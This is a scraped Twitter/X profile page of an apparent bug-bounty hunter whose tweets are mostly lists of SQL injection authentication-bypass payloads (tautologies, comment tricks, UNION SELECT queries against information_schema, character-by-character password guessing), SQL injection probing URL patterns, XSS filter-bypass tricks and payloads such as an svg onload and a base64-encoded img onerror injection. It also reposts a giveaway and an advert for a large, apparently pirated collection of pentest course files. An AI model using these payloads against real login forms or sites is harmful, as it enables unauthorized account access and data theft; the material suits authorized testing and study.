dreakehunter (@vismasolutions) 's Twitter Profile
dreakehunter

@vismasolutions

ID: 1692423557924753408

calendar_today18-08-2023 06:30:05

33 Tweet

1 Followers

3 Following

MrBeast (@mrbeast) 's Twitter Profile Photo

MY FIRST X VIDEO MADE OVER $250,000! 😲 But it’s a bit of a facade. Advertisers saw the attention it was getting and bought ads on my video (I think) and thus my revenue per view is prob higher than what you’d experience

MY FIRST X VIDEO MADE OVER $250,000! 😲

But it’s a bit of a facade. Advertisers saw the attention it was getting and bought ads on my video (I think) and thus my revenue per view is prob higher than what you’d experience
MrBeast (@mrbeast) 's Twitter Profile Photo

I’m gonna give 10 random people that repost this and follow me $25,000 for fun (the $250,000 my X video made) I’ll pick the winners in 72 hours

dreakehunter (@vismasolutions) 's Twitter Profile Photo

SQL Injection - Bypass Auth Payloads #bugbountytips #bugbountytip " or ""-" " or "" " " or ""&" " or ""^" " or ""*" or 1=1-- or true-- " or true-- ' or true-- ")or true-- ') or true-- ' or 'x'='x ) or ('x')=('x ')) or (('x'))=(('x " or "x"="x ") or ("x")=("x

dreakehunter (@vismasolutions) 's Twitter Profile Photo

Auth bypass Via SQL Injection Payloads #bugbountytips #bugbountytips ' or 'a'='a ' or a=a-- ' or a=a– ') or ('a'='a " or "a"="a ") or ("a"="a ') or ('a'='a and hi") or ("a"="a ' or 'one'='one ' or 'one'='one– ' or uid like '% ' or uname like '% ' or userid like '%

dreakehunter (@vismasolutions) 's Twitter Profile Photo

payloads by Auth Bypass ' OORR 1<2 # admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* #bugbountytips #bugbountytip

dreakehunter (@vismasolutions) 's Twitter Profile Photo

here are some tips that are used to easily find sql-Injection 70% /?q=1 /?q=1' /?q=1" /?q=[1] /?q[]=1 /?q=1` /?q=1\ /?q=1/*'*/ /?q=1/*!1111'*/ /?q=1''asd'' <== concat string Thanks #bugbountytips

dreakehunter (@vismasolutions) 's Twitter Profile Photo

XSS WAF Bypassing. #bugbountytip #bugbountytips 1) alert = window["al"+"ert"] 2) bypass()with `` 3) replace space with / 4) encode symbols: πŸ”Ή< = %3c πŸ”Ή> = %3e πŸ”Ή" = %22 πŸ”Ή[ = %5b πŸ”Ή] = %5d πŸ”Ή` = %60 Not Encoded Payload: <svg/onload=window["al"+"ert"]`1337`>

dreakehunter (@vismasolutions) 's Twitter Profile Photo

Auth Bypass via SQL ') or ('a'='a and hi") or ("a"="a ' UNION ALL SELECT 1, @version;# ' UNION ALL SELECT system_user(),user();# ' UNION select table_schema,table_name FROMinformation_Schema.tables;# admin' and substring(password/text(),1,1)='7 #bugbountytip

dreakehunter (@vismasolutions) 's Twitter Profile Photo

Alhamdulillah, I awarded $2750 from HackerOne Vulnerable: Account Takeover Tips: always check everything and function,check login history and update passwd or reused #bugbounty Bug : rate limit otp bypass

dreakehunter (@vismasolutions) 's Twitter Profile Photo

SQLi To Auth bypass ' group by password having 1=1-- ' group by userid having 1=1-- ' group by username having 1=1- information_Schema.tables;# admin' and substring(password/text(),1,1)='7 ' and substring(password/text(),1,1)='7 #bubountytip #bubountytips

X (@themsterdoctor1) 's Twitter Profile Photo

πŸ§ πŸ’£ 381 FILES. 200+ GB. ELITE ONLY. I just unlocked a vault that would make even top bug bounty hunters drop everything: πŸ”₯ OSCP πŸ”₯ OSEP πŸ”₯ OSWE πŸ”₯ THM / HTB πŸ”₯ EC-Council πŸ”₯ Cisco CyberOps πŸ”₯ Linux Priv Esc πŸ”₯ PEN-300 Full Video Series πŸ”₯ BloodHound, AD, SSH, API, SQL, πŸ”₯

πŸ§ πŸ’£  381 FILES. 200+ GB. ELITE ONLY.

I just unlocked a vault that would make even top bug bounty hunters drop everything:

πŸ”₯ OSCP
πŸ”₯ OSEP
πŸ”₯ OSWE
πŸ”₯ THM / HTB
πŸ”₯ EC-Council
πŸ”₯ Cisco CyberOps
πŸ”₯ Linux Priv Esc
πŸ”₯ PEN-300 Full Video Series
πŸ”₯ BloodHound, AD, SSH, API, SQL, πŸ”₯
dreakehunter (@vismasolutions) 's Twitter Profile Photo

IDOR on user profile update IDOR via email enumeration IDOR on subscription APIs Broken object-level authorization in API Reflected XSS in search bar Stored XSS in comments DOM-based XSS in JS-heavy pages Open redirect via query param Open redirect with base64 trick

dreakehunter (@vismasolutions) 's Twitter Profile Photo

Bug: XSS 1. Take url:http://login. target. com/return_url=sbsbHsjdbdsbsb= 2. Change to basic xss payload (no work) "><img src=x onerror=prompt(1)> 3. Change to basic payload encoded like Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KDEpPg==